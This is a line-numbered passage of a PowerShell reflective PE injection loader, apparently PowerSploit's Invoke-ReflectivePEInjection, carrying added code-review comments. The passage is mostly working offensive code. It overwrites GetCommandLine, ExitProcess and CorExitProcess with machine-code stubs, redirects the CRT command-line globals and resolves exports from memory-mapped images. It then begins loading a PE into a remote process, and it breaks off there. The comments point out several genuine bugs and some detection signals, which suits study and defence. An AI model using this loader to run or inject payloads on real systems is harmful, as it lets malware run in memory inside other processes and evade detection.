  1807.             [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
  1808.             $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)
                    # Section's in-memory start = image base + its VirtualAddress (RVA).
  1809.             [IntPtr]$SectionPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($SectionHeader.VirtualAddress)
  1810.  
  1811.             [UInt32]$ProtectFlag = Get-VirtualProtectValue $SectionHeader.Characteristics
                    # VirtualSize (not SizeOfRawData) is used, i.e. the mapped extent.
  1812.             [UInt32]$SectionSize = $SectionHeader.VirtualSize
  1813.  
  1814.             [UInt32]$OldProtectFlag = 0
                    # Range check result is discarded with Out-Null; presumably
                    # Test-MemoryRangeValid throws on its own when the range is bad -
                    # TODO confirm against its definition, which is outside this view.
  1815.             Test-MemoryRangeValid -DebugString "Update-MemoryProtectionFlags::VirtualProtect" -PEInfo $PEInfo -StartAddress $SectionPtr -Size $SectionSize | Out-Null
  1816.             $Success = $Win32Functions.VirtualProtect.Invoke($SectionPtr, $SectionSize, $ProtectFlag, [Ref]$OldProtectFlag)
  1817.             if ($Success -eq $false)
  1818.             {
  1819.                 Throw "Unable to change memory protection"
  1820.             }
  1821.         }
  1822.     }
  1823.  
  1824.  
  1825.  
  1826.     Function Update-ExeFunctions
  1827.     {
            # Patches process-wide entry points so an EXE run from memory sees the
            # supplied command line and does not terminate the host process:
            #   1. KernelBase!GetCommandLineA / GetCommandLineW are overwritten with a
            #      stub that hands back a copy of $ExeArguments.
            #   2. For each listed msvcr*.dll that is already loaded, the CRT globals
            #      _acmdln / _wcmdln are pointed at copies of $ExeArguments.
            #   3. mscoree!CorExitProcess and kernel32!ExitProcess are overwritten
            #      with a stub that sets the byte at $ExeDoneBytePtr and then calls
            #      kernel32!ExitThread through the embedded address.
            # Arguments: $PEInfo         - declared but not used in this body
            #            $Win32Functions - uses .GetModuleHandle, .GetProcAddress,
            #                              .VirtualProtect, .memcpy
            #            $Win32Constants - uses .PAGE_EXECUTE_READWRITE
            #            $ExeArguments   - command line to present to the loaded EXE
            #            $ExeDoneBytePtr - address of the completion flag byte that the
            #                              exit stub writes
            # Outputs:   an array of (address, saved-original-bytes-ptr, size) triples
            #            that Copy-ArrayOfMemAddresses can use to restore the patched
            #            code (see the NOTE at the second $ReturnArray reset below).
            # Throws:    on any handle/address lookup that yields IntPtr.Zero, and on
            #            VirtualProtect failure for the exit-function patches.
            # NOTE(review): every patch here is an in-process inline modification of
            # exported code in KernelBase / kernel32 / mscoree. Comparing a loaded
            # module's code pages against the on-disk image (or hook-detection
            # scans) exposes this; the VirtualProtect-to-RWX on image pages is the
            # runtime signal.
  1828.         Param(
  1829.         [Parameter(Position = 0, Mandatory = $true)]
  1830.         [System.Object]
  1831.         $PEInfo,
  1832.  
  1833.         [Parameter(Position = 1, Mandatory = $true)]
  1834.         [System.Object]
  1835.         $Win32Functions,
  1836.  
  1837.         [Parameter(Position = 2, Mandatory = $true)]
  1838.         [System.Object]
  1839.         $Win32Constants,
  1840.  
  1841.         [Parameter(Position = 3, Mandatory = $true)]
  1842.         [String]
  1843.         $ExeArguments,
  1844.  
  1845.         [Parameter(Position = 4, Mandatory = $true)]
  1846.         [IntPtr]
  1847.         $ExeDoneBytePtr
  1848.         )
  1849.  
  1850.  
  1851.         $ReturnArray = @()
  1852.  
  1853.         $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
  1854.         [UInt32]$OldProtectFlag = 0
  1855.  
  1856.         [IntPtr]$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("Kernel32.dll")
  1857.         if ($Kernel32Handle -eq [IntPtr]::Zero)
  1858.         {
  1859.             throw "Kernel32 handle null"
  1860.         }
  1861.  
  1862.         [IntPtr]$KernelBaseHandle = $Win32Functions.GetModuleHandle.Invoke("KernelBase.dll")
  1863.         if ($KernelBaseHandle -eq [IntPtr]::Zero)
  1864.         {
  1865.             throw "KernelBase handle null"
  1866.         }
  1867.  
  1868.  
  1869.  
  1870.  
                # Unmanaged copies of the argument string. They are embedded in the
                # patched GetCommandLine* stubs below, so they are intentionally never
                # freed by this function.
  1871.         $CmdLineWArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)
  1872.         $CmdLineAArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)
  1873.  
  1874.         [IntPtr]$GetCommandLineAAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineA")
  1875.         [IntPtr]$GetCommandLineWAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineW")
  1876.  
  1877.         if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)
  1878.         {
  1879.             throw "GetCommandLine ptr null. GetCommandLineA: $(Get-Hex $GetCommandLineAAddr). GetCommandLineW: $(Get-Hex $GetCommandLineWAddr)"
  1880.         }
  1881.  
  1882.  
                # Stub layout: Shellcode1 | <pointer, $PtrSize bytes> | Shellcode2.
                # Shellcode1 gets a 64-bit prefix byte when running as x64; Shellcode2
                # is a single return (0xc3). Total patch length is $TotalSize.
  1883.         [Byte[]]$Shellcode1 = @()
  1884.         if ($PtrSize -eq 8)
  1885.         {
  1886.             $Shellcode1 += 0x48
  1887.         }
  1888.         $Shellcode1 += 0xb8
  1889.  
  1890.         [Byte[]]$Shellcode2 = @(0xc3)
  1891.         $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length
  1892.  
  1893.  
  1894.  
                # Save the original $TotalSize bytes of both functions so they can be
                # restored later, and record (address, saved-bytes, size) for the caller.
  1895.         $GetCommandLineAOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
  1896.         $GetCommandLineWOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
  1897.         $Win32Functions.memcpy.Invoke($GetCommandLineAOrigBytesPtr, $GetCommandLineAAddr, [UInt64]$TotalSize) | Out-Null
  1898.         $Win32Functions.memcpy.Invoke($GetCommandLineWOrigBytesPtr, $GetCommandLineWAddr, [UInt64]$TotalSize) | Out-Null
  1899.         $ReturnArray += ,($GetCommandLineAAddr, $GetCommandLineAOrigBytesPtr, $TotalSize)
  1900.         $ReturnArray += ,($GetCommandLineWAddr, $GetCommandLineWOrigBytesPtr, $TotalSize)
  1901.  
  1902.  
  1903.         [UInt32]$OldProtectFlag = 0
  1904.         $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
                # BUG(review): '=' is assignment, not '-eq'. $Success is set to $false
                # and the condition is always false, so a failed VirtualProtect is
                # never reported here. Same pattern recurs for the W variant and in
                # the msvcr loop below.
  1905.         if ($Success = $false)
  1906.         {
  1907.             throw "Call to VirtualProtect failed"
  1908.         }
  1909.  
                # Write stub: prefix/opcode bytes, then the ANSI argument pointer,
                # then the return byte.
  1910.         $GetCommandLineAAddrTemp = $GetCommandLineAAddr
  1911.         Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineAAddrTemp
  1912.         $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)
  1913.         [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)
  1914.         $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp $PtrSize
  1915.         Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineAAddrTemp
  1916.  
                # Restore the previous page protection.
  1917.         $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
  1918.  
  1919.  
  1920.  
  1921.         [UInt32]$OldProtectFlag = 0
  1922.         $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
                # BUG(review): same assignment-instead-of-comparison as above.
  1923.         if ($Success = $false)
  1924.         {
  1925.             throw "Call to VirtualProtect failed"
  1926.         }
  1927.  
                # Same stub as the A variant, embedding the wide-string pointer.
  1928.         $GetCommandLineWAddrTemp = $GetCommandLineWAddr
  1929.         Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
  1930.         $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp ($Shellcode1.Length)
  1931.         [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineWArgsPtr, $GetCommandLineWAddrTemp, $false)
  1932.         $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp $PtrSize
  1933.         Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp
  1934.  
  1935.         $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
  1936.  
  1937.  
  1938.  
  1939.  
  1940.  
  1941.  
  1942.  
  1943.  
                # CRT runtimes (debug and release, VS2002 through VS2012) that cache
                # the command line in _acmdln/_wcmdln at startup. Only DLLs already
                # loaded in this process are patched (GetModuleHandle, not LoadLibrary).
  1944.         $DllList = @("msvcr70d.dll", "msvcr71d.dll", "msvcr80d.dll", "msvcr90d.dll", "msvcr100d.dll", "msvcr110d.dll", "msvcr70.dll" `
  1945.             , "msvcr71.dll", "msvcr80.dll", "msvcr90.dll", "msvcr100.dll", "msvcr110.dll")
  1946.  
  1947.         foreach ($Dll in $DllList)
  1948.         {
  1949.             [IntPtr]$DllHandle = $Win32Functions.GetModuleHandle.Invoke($Dll)
  1950.             if ($DllHandle -ne [IntPtr]::Zero)
  1951.             {
  1952.                 [IntPtr]$WCmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_wcmdln")
  1953.                 [IntPtr]$ACmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_acmdln")
  1954.                 if ($WCmdLnAddr -eq [IntPtr]::Zero -or $ACmdLnAddr -eq [IntPtr]::Zero)
  1955.                 {
                            # BUG(review): this is a bare string sent to the output
                            # stream, not a throw, so execution continues and the
                            # PtrToStructure/VirtualProtect calls below run against
                            # a zero address. It also pollutes the function's output
                            # array with a string.
  1956.                     "Error, couldn't find _wcmdln or _acmdln"
  1957.                 }
  1958.  
                        # Fresh unmanaged copies per DLL; they become the new values
                        # of the CRT globals and are not freed here.
  1959.                 $NewACmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)
  1960.                 $NewWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)
  1961.  
  1962.  
                        # _acmdln/_wcmdln are pointer-sized globals: read the current
                        # pointer value, stash it in a heap cell, and record
                        # (global address, stash, $PtrSize) for later restoration.
  1963.                 $OrigACmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ACmdLnAddr, [Type][IntPtr])
  1964.                 $OrigWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($WCmdLnAddr, [Type][IntPtr])
  1965.                 $OrigACmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
  1966.                 $OrigWCmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
  1967.                 [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigACmdLnPtr, $OrigACmdLnPtrStorage, $false)
  1968.                 [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigWCmdLnPtr, $OrigWCmdLnPtrStorage, $false)
  1969.                 $ReturnArray += ,($ACmdLnAddr, $OrigACmdLnPtrStorage, $PtrSize)
  1970.                 $ReturnArray += ,($WCmdLnAddr, $OrigWCmdLnPtrStorage, $PtrSize)
  1971.  
  1972.                 $Success = $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
                        # BUG(review): assignment, not comparison (see above).
  1973.                 if ($Success = $false)
  1974.                 {
  1975.                     throw "Call to VirtualProtect failed"
  1976.                 }
  1977.                 [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewACmdLnPtr, $ACmdLnAddr, $false)
  1978.                 $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null
  1979.  
  1980.                 $Success = $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
                        # BUG(review): assignment, not comparison (see above).
  1981.                 if ($Success = $false)
  1982.                 {
  1983.                     throw "Call to VirtualProtect failed"
  1984.                 }
  1985.                 [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewWCmdLnPtr, $WCmdLnAddr, $false)
  1986.                 $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null
  1987.             }
  1988.         }
  1989.  
  1990.  
  1991.  
  1992.  
  1993.  
  1994.  
                # NOTE(review): this reset discards every (address, saved-bytes, size)
                # entry collected above for GetCommandLineA/W and _acmdln/_wcmdln.
                # Only the exit-function patches collected below are returned, so the
                # earlier patches are never restored by Copy-ArrayOfMemAddresses and
                # their saved-bytes buffers leak. Looks unintended - confirm.
  1995.         $ReturnArray = @()
  1996.         $ExitFunctions = @()
  1997.  
  1998.  
  1999.         [IntPtr]$MscoreeHandle = $Win32Functions.GetModuleHandle.Invoke("mscoree.dll")
  2000.         if ($MscoreeHandle -eq [IntPtr]::Zero)
  2001.         {
  2002.             throw "mscoree handle null"
  2003.         }
  2004.         [IntPtr]$CorExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($MscoreeHandle, "CorExitProcess")
  2005.         if ($CorExitProcessAddr -eq [IntPtr]::Zero)
  2006.         {
  2007.             Throw "CorExitProcess address not found"
  2008.         }
  2009.         $ExitFunctions += $CorExitProcessAddr
  2010.  
  2011.  
  2012.         [IntPtr]$ExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitProcess")
  2013.         if ($ExitProcessAddr -eq [IntPtr]::Zero)
  2014.         {
  2015.             Throw "ExitProcess address not found"
  2016.         }
  2017.         $ExitFunctions += $ExitProcessAddr
  2018.  
  2019.         [UInt32]$OldProtectFlag = 0
  2020.         foreach ($ProcExitFunctionAddr in $ExitFunctions)
  2021.         {
  2022.             $ProcExitFunctionAddrTmp = $ProcExitFunctionAddr
  2023.  
  2024.  
                    # Exit stub layout:
                    #   Shellcode1 | <$ExeDoneBytePtr> | Shellcode2 | <ExitThread addr> | Shellcode3
                    # i.e. the done-flag address and the ExitThread address are
                    # embedded as immediates; the x64 variants carry REX prefixes and
                    # a stack adjustment before the call.
  2025.             [Byte[]]$Shellcode1 = @(0xbb)
  2026.             [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)
  2027.  
  2028.             if ($PtrSize -eq 8)
  2029.             {
  2030.                 [Byte[]]$Shellcode1 = @(0x48, 0xbb)
  2031.                 [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)
  2032.             }
  2033.             [Byte[]]$Shellcode3 = @(0xff, 0xd3)
  2034.             $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length + $PtrSize + $Shellcode3.Length
  2035.  
                    # Loop-invariant lookup; harmless but could be hoisted.
  2036.             [IntPtr]$ExitThreadAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitThread")
  2037.             if ($ExitThreadAddr -eq [IntPtr]::Zero)
  2038.             {
  2039.                 Throw "ExitThread address not found"
  2040.             }
  2041.  
                    # Unlike the earlier patches, this check uses '-eq' and so
                    # actually fires on failure.
  2042.             $Success = $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)
  2043.             if ($Success -eq $false)
  2044.             {
  2045.                 Throw "Call to VirtualProtect failed"
  2046.             }
  2047.  
  2048.  
                    # Save the original bytes for restoration and record the triple.
  2049.             $ExitProcessOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
  2050.             $Win32Functions.memcpy.Invoke($ExitProcessOrigBytesPtr, $ProcExitFunctionAddr, [UInt64]$TotalSize) | Out-Null
  2051.             $ReturnArray += ,($ProcExitFunctionAddr, $ExitProcessOrigBytesPtr, $TotalSize)
  2052.  
  2053.  
  2054.  
  2055.             Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $ProcExitFunctionAddrTmp
  2056.             $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode1.Length)
  2057.             [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExeDoneBytePtr, $ProcExitFunctionAddrTmp, $false)
  2058.             $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize
  2059.             Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $ProcExitFunctionAddrTmp
  2060.             $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode2.Length)
  2061.             [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExitThreadAddr, $ProcExitFunctionAddrTmp, $false)
  2062.             $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize
  2063.             Write-BytesToMemory -Bytes $Shellcode3 -MemoryAddress $ProcExitFunctionAddrTmp
  2064.  
  2065.             $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
  2066.         }
  2067.  
  2068.  
                # Emits only the exit-function triples (see NOTE at the reset above).
  2069.         Write-Output $ReturnArray
  2070.     }
  2071.  
  2072.  
  2073.  
  2074.  
  2075.     Function Copy-ArrayOfMemAddresses
  2076.     {
            # Restores patched code/data from saved copies. Each element of $CopyInfo
            # is a triple indexed as [0] = destination address, [1] = pointer to the
            # saved bytes, [2] = byte count - the shape produced by Update-ExeFunctions.
            # For each triple the destination is made writable, the saved bytes are
            # copied back with memcpy, and the previous protection is reinstated.
            # Arguments: $CopyInfo       - array of (address, saved-bytes-ptr, size)
            #            $Win32Functions - uses .VirtualProtect and .memcpy
            #            $Win32Constants - uses .PAGE_EXECUTE_READWRITE
            # Throws:    when the first VirtualProtect (to RWX) fails; the restoring
            #            VirtualProtect result is discarded.
            # NOTE(review): the saved-bytes buffers ($Info[1]) are not freed here, so
            # their release is the caller's responsibility - confirm against the
            # caller, which is outside this view.
  2077.         Param(
  2078.         [Parameter(Position = 0, Mandatory = $true)]
  2079.         [Array[]]
  2080.         $CopyInfo,
  2081.  
  2082.         [Parameter(Position = 1, Mandatory = $true)]
  2083.         [System.Object]
  2084.         $Win32Functions,
  2085.  
  2086.         [Parameter(Position = 2, Mandatory = $true)]
  2087.         [System.Object]
  2088.         $Win32Constants
  2089.         )
  2090.  
  2091.         [UInt32]$OldProtectFlag = 0
  2092.         foreach ($Info in $CopyInfo)
  2093.         {
  2094.             $Success = $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)
  2095.             if ($Success -eq $false)
  2096.             {
  2097.                 Throw "Call to VirtualProtect failed"
  2098.             }
  2099.  
                    # Copy direction: saved bytes ($Info[1]) back over the live address ($Info[0]).
  2100.             $Win32Functions.memcpy.Invoke($Info[0], $Info[1], [UInt64]$Info[2]) | Out-Null
  2101.  
  2102.             $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
  2103.         }
  2104.     }
  2105.  
  2106.  
  2107.  
  2108.  
  2109.  
  2110.     Function Get-MemoryProcAddress
  2111.     {
            # Resolves an exported function by name from a PE image that was mapped
            # into memory by this script (a GetProcAddress equivalent for images the
            # OS loader does not know about). Walks IMAGE_EXPORT_DIRECTORY:
            # AddressOfNames -> matching index -> AddressOfNameOrdinals -> index into
            # AddressOfFunctions -> RVA, then returns image base + RVA.
            # Arguments: $PEHandle     - base address of the in-memory image
            #            $FunctionName - export name; compared case-sensitively (-ceq)
            # Returns:   absolute address of the export, or [IntPtr]::Zero when the
            #            image has no export table or the name is not found
            # NOTE(review): forwarded exports are not distinguished - if the RVA
            # points into the export directory (a forwarder string) the returned
            # address is not code. Only named exports are searched; ordinal-only
            # exports are never matched.
  2112.         Param(
  2113.         [Parameter(Position = 0, Mandatory = $true)]
  2114.         [IntPtr]
  2115.         $PEHandle,
  2116.  
  2117.         [Parameter(Position = 1, Mandatory = $true)]
  2118.         [String]
  2119.         $FunctionName
  2120.         )
  2121.  
                # Re-parses the headers on every call; fine for occasional lookups.
  2122.         $Win32Types = Get-Win32Types
  2123.         $Win32Constants = Get-Win32Constants
  2124.         $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
  2125.  
  2126.  
  2127.         if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0)
  2128.         {
  2129.             return [IntPtr]::Zero
  2130.         }
  2131.         $ExportTablePtr = Add-SignedIntAsUnsigned ($PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress)
  2132.         $ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTablePtr, [Type]$Win32Types.IMAGE_EXPORT_DIRECTORY)
  2133.  
                # Linear scan of the name table (entries are UInt32 RVAs to ANSI strings).
  2134.         for ($i = 0; $i -lt $ExportTable.NumberOfNames; $i++)
  2135.         {
  2136.  
  2137.             $NameOffsetPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNames + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))
  2138.             $NamePtr = Add-SignedIntAsUnsigned ($PEHandle) ([System.Runtime.InteropServices.Marshal]::PtrToStructure($NameOffsetPtr, [Type][UInt32]))
  2139.             $Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr)
  2140.  
  2141.             if ($Name -ceq $FunctionName)
  2142.             {
  2143.  
  2144.  
                        # Name index i -> UInt16 ordinal-table entry -> index into the
                        # UInt32 function RVA table.
  2145.                 $OrdinalPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNameOrdinals + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16])))
  2146.                 $FuncIndex = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OrdinalPtr, [Type][UInt16])
  2147.                 $FuncOffsetAddr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfFunctions + ($FuncIndex * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))
  2148.                 $FuncOffset = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FuncOffsetAddr, [Type][UInt32])
  2149.                 return Add-SignedIntAsUnsigned ($PEHandle) ($FuncOffset)
  2150.             }
  2151.         }
  2152.  
  2153.         return [IntPtr]::Zero
  2154.     }
  2155.  
  2156.  
  2157.     Function Invoke-MemoryLoadLibrary
  2158.     {
  2159.         Param(
  2160.         [Parameter( Position = 0, Mandatory = $true )]
  2161.         [Byte[]]
  2162.         $PEBytes,
  2163.  
  2164.         [Parameter(Position = 1, Mandatory = $false)]
  2165.         [String]
  2166.         $ExeArgs,
  2167.  
  2168.         [Parameter(Position = 2, Mandatory = $false)]
  2169.         [IntPtr]
  2170.         $RemoteProcHandle,
  2171.  
  2172.         [Parameter(Position = 3)]
  2173.         [Bool]
  2174.         $ForceASLR = $false
  2175.         )
  2176.  
  2177.         $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
  2178.  
  2179.  
  2180.         $Win32Constants = Get-Win32Constants
  2181.         $Win32Functions = Get-Win32Functions
  2182.         $Win32Types = Get-Win32Types
  2183.  
  2184.         $RemoteLoading = $false
  2185.         if (($RemoteProcHandle -ne $null) -and ($RemoteProcHandle -ne [IntPtr]::Zero))
  2186.         {
  2187.             $RemoteLoading = $true
  2188.         }
  2189.  
  2190.  
  2191.         Write-Verbose "Getting basic PE information from the file"
  2192.         $PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types
  2193.         $OriginalImageBase = $PEInfo.OriginalImageBase
  2194.         $NXCompatible = $true
  2195.         if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
  2196.         {
  2197.             Write-Warning "PE is not compatible with DEP, might cause issues" -WarningAction Continue
  2198.             $NXCompatible = $false
  2199.         }
  2200.  
  2201.  
  2202.  
  2203.         $Process64Bit = $true
  2204.         if ($RemoteLoading -eq $true)
  2205.         {
  2206.             $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
  2207.             $Result = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "IsWow64Process")
  2208.             if ($Result -eq [IntPtr]::Zero)
  2209.             {
  2210.                 Throw "Couldn't locate IsWow64Process function to determine if target process is 32bit or 64bit"
  2211.             }
  2212.  
  2213.             [Bool]$Wow64Process = $false
  2214.             $Success = $Win32Functions.IsWow64Process.Invoke($RemoteProcHandle, [Ref]$Wow64Process)
  2215.             if ($Success -eq $false)
  2216.             {
  2217.                 Throw "Call to IsWow64Process failed"
  2218.             }
  2219.  
  2220.             if (($Wow64Process -eq $true) -or (($Wow64Process -eq $false) -and ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4)))
  2221.             {
  2222.                 $Process64Bit = $false
  2223.             }
  2224.  
  2225.  
  2226.             $PowerShell64Bit = $true
  2227.             if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)
  2228.             {
  2229.                 $PowerShell64Bit = $false
  2230.             }
  2231.             if ($PowerShell64Bit -ne $Process64Bit)
  2232.             {
  2233.                 throw "PowerShell must be same architecture (x86/x64) as PE being loaded and remote process"
  2234.             }
  2235.         }
  2236.         else
  2237.         {
  2238.             if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)
  2239.             {
  2240.                 $Process64Bit = $false
  2241.             }
  2242.         }
  2243.         if ($Process64Bit -ne $PEInfo.PE64Bit)
  2244.         {
  2245.             Throw "PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)"
  2246.         }
  2247.  
  2248.  
  2249.  
  2250.         Write-Verbose "Allocating memory for the PE and write its headers to memory"
  2251.  
  2252.  
  2253.         [IntPtr]$LoadAddr = [IntPtr]::Zero
  2254.         $PESupportsASLR = ([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -eq $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
  2255.         if ((-not $ForceASLR) -and (-not $PESupportsASLR))
  2256.         {
  2257.             Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again OR try using the -ForceASLR flag (could cause crashes)" -WarningAction Continue
  2258.             [IntPtr]$LoadAddr = $OriginalImageBase
  2259.         }
  2260.         elseif ($ForceASLR -and (-not $PESupportsASLR))
  2261.         {
  2262.             Write-Verbose "PE file doesn't support ASLR but -ForceASLR is set. Forcing ASLR on the PE file. This could result in a crash."
  2263.         }
  2264.  
  2265.         if ($ForceASLR -and $RemoteLoading)
  2266.         {
  2267.             Write-Error "Cannot use ForceASLR when loading in to a remote process." -ErrorAction Stop
  2268.         }
  2269.         if ($RemoteLoading -and (-not $PESupportsASLR))
  2270.         {
  2271.             Write-Error "PE doesn't support ASLR. Cannot load a non-ASLR PE in to a remote process" -ErrorAction Stop
  2272.         }
  2273.  
  2274.         $PEHandle = [IntPtr]::Zero
  2275.         $EffectivePEHandle = [IntPtr]::Zero
  2276.         if ($RemoteLoading -eq $true)
  2277.         {
  2278.  
  2279.             $PEHandle = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
  2280.  
  2281.  
